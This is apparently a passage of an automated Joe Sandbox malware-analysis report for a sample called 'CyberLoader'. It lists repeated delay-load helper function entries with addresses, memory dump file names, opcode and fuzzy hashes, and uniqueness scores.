                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 211d5baa6fa3438cf32987d4d0f62d0664e2dfa612f50bc89d9c9f605263535c
                                                  • Instruction ID: 11f93efcdb400f3326f92e4e5e68aa380cb340953330d724f0c9562779a850d8
                                                  • Opcode Fuzzy Hash: 211d5baa6fa3438cf32987d4d0f62d0664e2dfa612f50bc89d9c9f605263535c
                                                  • Instruction Fuzzy Hash: D3B0929927A002AD3218710429069360368C0A5B11320841BB50AC11C1D9804C2D9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 86dbd8719a1e6a18d6c168509e72e60fd97c6500397dbb9ff877326ff884d6cb
                                                  • Instruction ID: 092ac73a315ee19fe7739b9d731c949b49e37718c8f59d10b81aa8d71c265cea
                                                  • Opcode Fuzzy Hash: 86dbd8719a1e6a18d6c168509e72e60fd97c6500397dbb9ff877326ff884d6cb
                                                  • Instruction Fuzzy Hash: B8B0129D37E042AD311C71042E07D37036CC0E9B11330841BF20AC01C1DD814C3E9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 8662d06767c64cf748c9df6855c0de50058da6ae7bd7228b3d59a61d5e19c855
                                                  • Instruction ID: bdef300bdb710e5e63fcbc03c238cdc78d3c061ab1458213aa4da620262ace3d
                                                  • Opcode Fuzzy Hash: 8662d06767c64cf748c9df6855c0de50058da6ae7bd7228b3d59a61d5e19c855
                                                  • Instruction Fuzzy Hash: 5BB0129D37E106BD321831002D07C37032CC0E1B11330452BF106D00C1DD804C7D9531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DBD5
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 71e322d2f92e3098bf5e67ae2662c519f479338b54d1581438e0f0fcfc46ee12
                                                  • Instruction ID: a7c5d6717a0196d9925e0e200c11c26da513eedd85be878a5ec272e2c291bddc
                                                  • Opcode Fuzzy Hash: 71e322d2f92e3098bf5e67ae2662c519f479338b54d1581438e0f0fcfc46ee12
                                                  • Instruction Fuzzy Hash: 28B0129D37E001AD311871142D07E36036CD0F5B11330842BF10BD05C1DD804C3D9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 897f1eeed49c25f16189ccf93593946b9e8c9d9d2d2b1615073f47673044a922
                                                  • Instruction ID: dd5fb0660b011a077a8a80d54b4e596eca9054e0852af6f960fe8c4de6f46071
                                                  • Opcode Fuzzy Hash: 897f1eeed49c25f16189ccf93593946b9e8c9d9d2d2b1615073f47673044a922
                                                  • Instruction Fuzzy Hash: 95B0929927A201AD210831106A12936032CC1D1B11320861BF209A00C2A9809C6CA531
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 56cbc9c391f88a5974f7b27146f0e8573cc040fcac0896fdd9e3ef78c6916f87
                                                  • Instruction ID: 42303275d729f791ea750f1a04b31948396aab5806dfed0a32dd8b8c56341d25
                                                  • Opcode Fuzzy Hash: 56cbc9c391f88a5974f7b27146f0e8573cc040fcac0896fdd9e3ef78c6916f87
                                                  • Instruction Fuzzy Hash: BAB0929927A202AD310871146912A36036CC0D1B10320851BF20DD11C2E9809C2C9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028DC36
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 41ce369bfa6126703199c2cf3c11f67df6ec2969c3d57900bdb7d32eb487d47e
                                                  • Instruction ID: af42893d4ad725d47112790551c262c26e9147fdc9bf365c0e9824f9d4074f83
                                                  • Opcode Fuzzy Hash: 41ce369bfa6126703199c2cf3c11f67df6ec2969c3d57900bdb7d32eb487d47e
                                                  • Instruction Fuzzy Hash: 09B0929927A101AD210871146912A36036CC0D6B10320851BF60DD11C2E9809C2C9631
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ee1dec5cfd25aeb2bcfde788eb3562698ecd0483adb7f4e4e317827a82224cdf
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: ee1dec5cfd25aeb2bcfde788eb3562698ecd0483adb7f4e4e317827a82224cdf
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: dbb97e40cb476801744c53f06ada554466e7cdff049247ef1e688a27ef2d95dc
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: dbb97e40cb476801744c53f06ada554466e7cdff049247ef1e688a27ef2d95dc
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: ba0233abc1685bce0fb1cb50e26c15bf8861c32ac853aec0939e63f3970a618e
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: ba0233abc1685bce0fb1cb50e26c15bf8861c32ac853aec0939e63f3970a618e
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 516d1460437d9256484f592806b36f6360da790523e6e2fba397835c9c0226c5
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: 516d1460437d9256484f592806b36f6360da790523e6e2fba397835c9c0226c5
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: b30a5e637050edd99719b5476a7be55d3be23108dd8a113c7e44391d8f8921cd
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: b30a5e637050edd99719b5476a7be55d3be23108dd8a113c7e44391d8f8921cd
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 37be2f46f19ed46699838c2b95605c90a549f6db41ca258cbab7c1dae9b57520
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: 37be2f46f19ed46699838c2b95605c90a549f6db41ca258cbab7c1dae9b57520
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: c06f164527f9b1303d8f6e70ce29c3d6dc9fb2dbe6755d834dc0364cfefb5348
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: c06f164527f9b1303d8f6e70ce29c3d6dc9fb2dbe6755d834dc0364cfefb5348
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID:
                                                  • API String ID: 1269201914-0
                                                  • Opcode ID: 4fbb13c6eec2f0e21841b5ee38bfab88129c03f945178f09834994ed3cdb609e
                                                  • Instruction ID: d498d0247bd15f69cb23bbcd8fd0e4783420fbcaa6166ab766808027c4096d28
                                                  • Opcode Fuzzy Hash: 4fbb13c6eec2f0e21841b5ee38bfab88129c03f945178f09834994ed3cdb609e
                                                  • Instruction Fuzzy Hash: FAA0029957E5027D311971516D56D36071CC4D7B523304519F546944C1D980586D5931
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028D8A3
